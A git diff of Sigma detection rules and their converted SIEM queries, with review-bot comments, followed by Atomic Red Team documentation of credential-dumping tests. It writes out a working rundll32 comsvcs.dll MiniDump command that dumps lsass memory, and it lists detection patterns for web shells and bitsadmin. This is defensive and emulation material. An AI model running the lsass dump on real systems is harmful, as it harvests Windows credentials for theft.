- '*\taskhost.exe'
filter:
Image:
- 'C:\Windows\System32\\*'
- 'C:\Windows\system32\\*'
- 'C:\Windows\SysWow64\\*'
- 'C:\Windows\SysWOW64\\*'
- 'C:\Windows\explorer.exe'
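Review bot: adding `C:\Windows\system32\\*` beside `C:\Windows\System32\\*` (and `SysWow64` beside `SysWOW64`) enumerates two spellings of paths that Windows treats case-insensitively; `C:\WINDOWS\system32\`, `c:\windows\system32\` and the `\??\C:\` device form still bypass the filter and the rule then fires on legitimate binaries, which is the wrong direction for a high-severity rule. Since the generated queries below match on `Image.keyword`, fix this at the index (a `lowercase` normalizer on the field) or with a case-insensitive `|re` modifier where the backend supports it, rather than growing the casing list in the rule. The `Image` selection list (`*\svchost.exe`, ...) has the same exposure.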
@ -76,42 +77,42 @@ level: high
### es-qs
```
(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <<EOF\n{\n "metadata": {\n "title": "System File Execution Location Anomaly",\n "description": "Detects a Windows program executable started in a suspicious folder",\n "tags": [\n "attack.defense_evasion",\n "attack.t1036"\n ],\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR 
C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'System File Execution Location Anomaly\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <<EOF\n{\n "metadata": {\n "title": "System File Execution Location Anomaly",\n "description": "Detects a Windows program executable started in a suspicious folder",\n "tags": [\n "attack.defense_evasion",\n "attack.t1036"\n ],\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR 
C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'System File Execution Location Anomaly\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(Image.keyword:(*\\\\svchost.exe *\\\\rundll32.exe *\\\\services.exe *\\\\powershell.exe *\\\\regsvr32.exe *\\\\spoolsv.exe *\\\\lsass.exe *\\\\smss.exe *\\\\csrss.exe *\\\\conhost.exe *\\\\wininit.exe *\\\\lsm.exe *\\\\winlogon.exe *\\\\explorer.exe *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* C\\:\\\\Windows\\\\SysWow64\\\\* C\\:\\\\Windows\\\\SysWOW64\\\\* C\\:\\\\Windows\\\\explorer.exe C\\:\\\\Windows\\\\winsxs\\\\* C\\:\\\\Windows\\\\WinSxS\\\\* \\\\SystemRoot\\\\System32\\\\*))))
(Image.keyword:(*\\\\svchost.exe *\\\\rundll32.exe *\\\\services.exe *\\\\powershell.exe *\\\\regsvr32.exe *\\\\spoolsv.exe *\\\\lsass.exe *\\\\smss.exe *\\\\csrss.exe *\\\\conhost.exe *\\\\wininit.exe *\\\\lsm.exe *\\\\winlogon.exe *\\\\explorer.exe *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* C\\:\\\\Windows\\\\system32\\\\* C\\:\\\\Windows\\\\SysWow64\\\\* C\\:\\\\Windows\\\\SysWOW64\\\\* C\\:\\\\Windows\\\\explorer.exe C\\:\\\\Windows\\\\winsxs\\\\* C\\:\\\\Windows\\\\WinSxS\\\\* \\\\SystemRoot\\\\System32\\\\*))))
```
### splunk
```
((Image="*\\\\svchost.exe" OR Image="*\\\\rundll32.exe" OR Image="*\\\\services.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\spoolsv.exe" OR Image="*\\\\lsass.exe" OR Image="*\\\\smss.exe" OR Image="*\\\\csrss.exe" OR Image="*\\\\conhost.exe" OR Image="*\\\\wininit.exe" OR Image="*\\\\lsm.exe" OR Image="*\\\\winlogon.exe" OR Image="*\\\\explorer.exe" OR Image="*\\\\taskhost.exe") NOT ((Image="C:\\\\Windows\\\\System32\\\\*" OR Image="C:\\\\Windows\\\\SysWow64\\\\*" OR Image="C:\\\\Windows\\\\SysWOW64\\\\*" OR Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\winsxs\\\\*" OR Image="C:\\\\Windows\\\\WinSxS\\\\*" OR Image="\\\\SystemRoot\\\\System32\\\\*"))) | table ComputerName,User,Image
((Image="*\\\\svchost.exe" OR Image="*\\\\rundll32.exe" OR Image="*\\\\services.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\spoolsv.exe" OR Image="*\\\\lsass.exe" OR Image="*\\\\smss.exe" OR Image="*\\\\csrss.exe" OR Image="*\\\\conhost.exe" OR Image="*\\\\wininit.exe" OR Image="*\\\\lsm.exe" OR Image="*\\\\winlogon.exe" OR Image="*\\\\explorer.exe" OR Image="*\\\\taskhost.exe") NOT ((Image="C:\\\\Windows\\\\System32\\\\*" OR Image="C:\\\\Windows\\\\system32\\\\*" OR Image="C:\\\\Windows\\\\SysWow64\\\\*" OR Image="C:\\\\Windows\\\\SysWOW64\\\\*" OR Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\winsxs\\\\*" OR Image="C:\\\\Windows\\\\WinSxS\\\\*" OR Image="\\\\SystemRoot\\\\System32\\\\*"))) | table ComputerName,User,Image
```
### logpoint
```
(event_id="1" Image IN ["*\\\\svchost.exe", "*\\\\rundll32.exe", "*\\\\services.exe", "*\\\\powershell.exe", "*\\\\regsvr32.exe", "*\\\\spoolsv.exe", "*\\\\lsass.exe", "*\\\\smss.exe", "*\\\\csrss.exe", "*\\\\conhost.exe", "*\\\\wininit.exe", "*\\\\lsm.exe", "*\\\\winlogon.exe", "*\\\\explorer.exe", "*\\\\taskhost.exe"] -(Image IN ["C:\\\\Windows\\\\System32\\\\*", "C:\\\\Windows\\\\SysWow64\\\\*", "C:\\\\Windows\\\\SysWOW64\\\\*", "C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\winsxs\\\\*", "C:\\\\Windows\\\\WinSxS\\\\*", "\\\\SystemRoot\\\\System32\\\\*"]))
(event_id="1" Image IN ["*\\\\svchost.exe", "*\\\\rundll32.exe", "*\\\\services.exe", "*\\\\powershell.exe", "*\\\\regsvr32.exe", "*\\\\spoolsv.exe", "*\\\\lsass.exe", "*\\\\smss.exe", "*\\\\csrss.exe", "*\\\\conhost.exe", "*\\\\wininit.exe", "*\\\\lsm.exe", "*\\\\winlogon.exe", "*\\\\explorer.exe", "*\\\\taskhost.exe"] -(Image IN ["C:\\\\Windows\\\\System32\\\\*", "C:\\\\Windows\\\\system32\\\\*", "C:\\\\Windows\\\\SysWow64\\\\*", "C:\\\\Windows\\\\SysWOW64\\\\*", "C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\winsxs\\\\*", "C:\\\\Windows\\\\WinSxS\\\\*", "\\\\SystemRoot\\\\System32\\\\*"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*.*\\svchost\\.exe|.*.*\\rundll32\\.exe|.*.*\\services\\.exe|.*.*\\powershell\\.exe|.*.*\\regsvr32\\.exe|.*.*\\spoolsv\\.exe|.*.*\\lsass\\.exe|.*.*\\smss\\.exe|.*.*\\csrss\\.exe|.*.*\\conhost\\.exe|.*.*\\wininit\\.exe|.*.*\\lsm\\.exe|.*.*\\winlogon\\.exe|.*.*\\explorer\\.exe|.*.*\\taskhost\\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\System32\\\\.*|.*C:\\Windows\\SysWow64\\\\.*|.*C:\\Windows\\SysWOW64\\\\.*|.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\winsxs\\\\.*|.*C:\\Windows\\WinSxS\\\\.*|.*\\SystemRoot\\System32\\\\.*))))))'
grep -P '^(?:.*(?=.*(?:.*.*\\svchost\\.exe|.*.*\\rundll32\\.exe|.*.*\\services\\.exe|.*.*\\powershell\\.exe|.*.*\\regsvr32\\.exe|.*.*\\spoolsv\\.exe|.*.*\\lsass\\.exe|.*.*\\smss\\.exe|.*.*\\csrss\\.exe|.*.*\\conhost\\.exe|.*.*\\wininit\\.exe|.*.*\\lsm\\.exe|.*.*\\winlogon\\.exe|.*.*\\explorer\\.exe|.*.*\\taskhost\\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\System32\\\\.*|.*C:\\Windows\\system32\\\\.*|.*C:\\Windows\\SysWow64\\\\.*|.*C:\\Windows\\SysWOW64\\\\.*|.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\winsxs\\\\.*|.*C:\\Windows\\WinSxS\\\\.*|.*\\SystemRoot\\System32\\\\.*))))))'
```
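Review bot: adding the lowercase `C\\:\\\\Windows\\\\system32\\\\*` entry to the NOT-filter covers only one more spelling of the path. `Image.keyword` is compared case-sensitively, which is why `SysWow64`/`SysWOW64` and `winsxs`/`WinSxS` already have to be listed twice, and any casing not enumerated (for example `c:\windows\System32\...`) still escapes the exclusion and fires the rule on a legitimate binary. Rather than growing the allow-list one variant at a time across es-qs, graylog, splunk, logpoint and grep, normalise the case of `Image` at ingest or match against a case-insensitive field; at minimum note in the rule that the exclusion is case-sensitive so backend maintainers know why the duplicates are there.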

View File

@ -24,7 +24,7 @@ description: The Tasks folder in system32 and syswow64 are globally writable pat
references:
- https://twitter.com/subTee/status/1216465628946563073
- https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26
date: 2020/13/01
date: 2020/01/13
author: Sreeman
tags:
- attack.t1064

View File

@ -23,7 +23,7 @@ status: experimental
description: Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack
author: Thomas Patzke
date: 2019/01/16
modified: 2020/03/03
modified: 2020/03/25
logsource:
category: process_creation
product: windows
@ -40,6 +40,7 @@ detection:
- '*\sh.exe'
- '*\bash.exe'
- '*\powershell.exe'
- '*\bitsadmin.exe'
condition: selection
fields:
- CommandLine
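Review bot: `'*\bitsadmin.exe'` is a transfer utility, not a shell, so the selection now reaches beyond what the rule's title ("Shells Spawned by Web Servers") and description ("Web servers that spawn shell processes") tell an analyst it catches. Either widen the description to say that download utilities spawned by a web server process are included, with the matching false-positive note, or move bitsadmin into a separate rule so the two behaviours can be tuned independently. The `modified: 2020/03/25` bump is consistent with the other rules touched in this commit.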
@ -61,42 +62,42 @@ level: high
### es-qs
```
(ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe))
(ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8202070f-edeb-4d31-a010-a26c72ac5600 <<EOF\n{\n "metadata": {\n "title": "Shells Spawned by Web Servers",\n "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack",\n "tags": [\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Shells Spawned by Web Servers\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8202070f-edeb-4d31-a010-a26c72ac5600 <<EOF\n{\n "metadata": {\n "title": "Shells Spawned by Web Servers",\n "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack",\n "tags": [\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Shells Spawned by Web Servers\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage.keyword:(*\\\\w3wp.exe *\\\\httpd.exe *\\\\nginx.exe *\\\\php\\-cgi.exe *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe *\\\\sh.exe *\\\\bash.exe *\\\\powershell.exe))
(ParentImage.keyword:(*\\\\w3wp.exe *\\\\httpd.exe *\\\\nginx.exe *\\\\php\\-cgi.exe *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe *\\\\sh.exe *\\\\bash.exe *\\\\powershell.exe *\\\\bitsadmin.exe))
```
### splunk
```
((ParentImage="*\\\\w3wp.exe" OR ParentImage="*\\\\httpd.exe" OR ParentImage="*\\\\nginx.exe" OR ParentImage="*\\\\php-cgi.exe" OR ParentImage="*\\\\tomcat.exe") (Image="*\\\\cmd.exe" OR Image="*\\\\sh.exe" OR Image="*\\\\bash.exe" OR Image="*\\\\powershell.exe")) | table CommandLine,ParentCommandLine
((ParentImage="*\\\\w3wp.exe" OR ParentImage="*\\\\httpd.exe" OR ParentImage="*\\\\nginx.exe" OR ParentImage="*\\\\php-cgi.exe" OR ParentImage="*\\\\tomcat.exe") (Image="*\\\\cmd.exe" OR Image="*\\\\sh.exe" OR Image="*\\\\bash.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\bitsadmin.exe")) | table CommandLine,ParentCommandLine
```
### logpoint
```
(event_id="1" ParentImage IN ["*\\\\w3wp.exe", "*\\\\httpd.exe", "*\\\\nginx.exe", "*\\\\php-cgi.exe", "*\\\\tomcat.exe"] Image IN ["*\\\\cmd.exe", "*\\\\sh.exe", "*\\\\bash.exe", "*\\\\powershell.exe"])
(event_id="1" ParentImage IN ["*\\\\w3wp.exe", "*\\\\httpd.exe", "*\\\\nginx.exe", "*\\\\php-cgi.exe", "*\\\\tomcat.exe"] Image IN ["*\\\\cmd.exe", "*\\\\sh.exe", "*\\\\bash.exe", "*\\\\powershell.exe", "*\\\\bitsadmin.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*.*\\w3wp\\.exe|.*.*\\httpd\\.exe|.*.*\\nginx\\.exe|.*.*\\php-cgi\\.exe|.*.*\\tomcat\\.exe))(?=.*(?:.*.*\\cmd\\.exe|.*.*\\sh\\.exe|.*.*\\bash\\.exe|.*.*\\powershell\\.exe)))'
grep -P '^(?:.*(?=.*(?:.*.*\\w3wp\\.exe|.*.*\\httpd\\.exe|.*.*\\nginx\\.exe|.*.*\\php-cgi\\.exe|.*.*\\tomcat\\.exe))(?=.*(?:.*.*\\cmd\\.exe|.*.*\\sh\\.exe|.*.*\\bash\\.exe|.*.*\\powershell\\.exe|.*.*\\bitsadmin\\.exe)))'
```

View File

@ -145,23 +145,27 @@ The /proc filesystem on Linux contains a great deal of information regarding the
- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-6---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-7---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-8---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
- [Atomic Test #9 - Offline Credential Theft With Mimikatz](#atomic-test-9---offline-credential-theft-with-mimikatz)
- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #10 - Dump Active Directory Database with NTDSUtil](#atomic-test-10---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #11 - GPP Passwords (findstr)](#atomic-test-11---gpp-passwords-findstr)
- [Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-11---create-volume-shadow-copy-with-ntdsdit)
- [Atomic Test #12 - GPP Passwords (Get-GPPPassword)](#atomic-test-12---gpp-passwords-get-gpppassword)
- [Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-12---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #13 - LSASS read with pypykatz](#atomic-test-13---lsass-read-with-pypykatz)
- [Atomic Test #13 - GPP Passwords (findstr)](#atomic-test-13---gpp-passwords-findstr)
- [Atomic Test #14 - Registry parse with pypykatz](#atomic-test-14---registry-parse-with-pypykatz)
- [Atomic Test #14 - GPP Passwords (Get-GPPPassword)](#atomic-test-14---gpp-passwords-get-gpppassword)
- [Atomic Test #15 - LSASS read with pypykatz](#atomic-test-15---lsass-read-with-pypykatz)
- [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz)
<br/>
@ -353,7 +357,7 @@ del %temp%\security >nul 2> nul
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
@ -403,7 +407,88 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
